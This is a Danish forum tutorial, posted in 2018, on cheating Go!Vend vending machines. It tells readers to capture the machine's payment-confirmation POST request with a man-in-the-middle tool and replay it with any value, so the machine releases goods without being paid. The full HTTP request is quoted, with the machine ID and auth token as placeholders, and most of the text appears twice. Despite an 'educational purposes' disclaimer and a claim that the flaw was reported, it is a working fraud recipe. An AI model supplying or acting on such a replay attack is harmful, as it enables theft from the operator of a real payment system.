16-05-2018, 21:07
Davs igen... Så kom der en lille tutorial igen :)
Beskrivelse:
Med lidt hjerne og forståelse indenfor POST Requests, så kan du hacke dig frem til dit næste måltid.
Jeg anbefaler ikke at du gør dette, medmindre du er en som ejer sådan en her maskine, da det kan få store konsekvenser.
Denne tutorial er kun til educational purposes only (udelukkende til uddannelsesformål) og er blevet rapporteret og vil derfor højst sandsynligt blive fikset snarrest.
Hvad du skal bruge:
De har lavet deres API på denne "fantastiske" måde med, at du blot kan sende en request, som normalt bliver lavet, når du har overført et beløb til automaten. Denne request er åben og har ingen næsten ingen form for validering.
Først skal du fange requesten. Det går jeg ud fra at du ved hvordan man gør... (burp, fiddler... andet mitm program)
Nu kommer den sjove part! :D
Du skal nu blot gensende requesten som sørger for at maskinen ved at den har "modtaget" penge.
En request kan se sådan her ud:
I det øjeblik denne request vil blive sendt, vil maskinen automatisk tro at den har fået overført penge og du kan derfor ændre værdien, YY,som du har lyst til. Så hvis du ville have en ting til 17 kr., så kan du blot skrive 17 ind på YY's plads.
XXXXXXXXXXXXXXX er maskinens ID og kan findes ved at fange requesten eller blot finde en QR scanner og scanne QR koden.
ZZZZZZZZZZZZZZZZZZZZZZZZZZZZ er det som gør at du skal ud til maskinen igen senere og fange en ny request, fordi den udløber efter x antal tid.
Det er som sagt allerede blevet sagt videre til virksomheden, Go!Vend, som er partnere med Arla.
- TheHacker, ude
Beskrivelse:
Med lidt hjerne og forståelse indenfor POST Requests, så kan du hacke dig frem til dit næste måltid.
Jeg anbefaler ikke at du gør dette, medmindre du er en som ejer sådan en her maskine, da det kan få store konsekvenser.
Denne tutorial er kun til educational purposes only (udelukkende til uddannelsesformål) og er blevet rapporteret og vil derfor højst sandsynligt blive fikset snarrest.
Hvad du skal bruge:
- En Go!Vend Automat
- En hjerne
- En platform/program/addon til at fange/sende POST Requests (hvis du ikke ved hvordan man gør det, så behøver du ikke at læse videre)
De har lavet deres API på denne "fantastiske" måde med, at du blot kan sende en request, som normalt bliver lavet, når du har overført et beløb til automaten. Denne request er åben og har ingen næsten ingen form for validering.
Først skal du fange requesten. Det går jeg ud fra at du ved hvordan man gør... (burp, fiddler... andet mitm program)
Nu kommer den sjove part! :D
Du skal nu blot gensende requesten som sørger for at maskinen ved at den har "modtaget" penge.
En request kan se sådan her ud:
Spoiler (Click to View)
TheHacker Skrev:POST http://goappified.cumulocity.com/vendme-...er?machine=XXXXXXXXXXXXXXX&value=YY& HTTP/1.1
Host: goappified.cumulocity.com
Content-Type: application/json
User-Agent: Go!Vend/1.4
Connection: close
Accept: application/json
X-Cumulocity-Application-Key: vendme
Content-Length: 42
Authorization: Basic ZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
Accept-Language: da-DK;q=1, en-US;q=0.9
{"machine":"XXXXXXXXXXXXXXX","value":"YY"}
XXXXXXXXXXXXXXX er maskinens ID og kan findes ved at fange requesten eller blot finde en QR scanner og scanne QR koden.
ZZZZZZZZZZZZZZZZZZZZZZZZZZZZ er det som gør at du skal ud til maskinen igen senere og fange en ny request, fordi den udløber efter x antal tid.
Det er som sagt allerede blevet sagt videre til virksomheden, Go!Vend, som er partnere med Arla.
- TheHacker, ude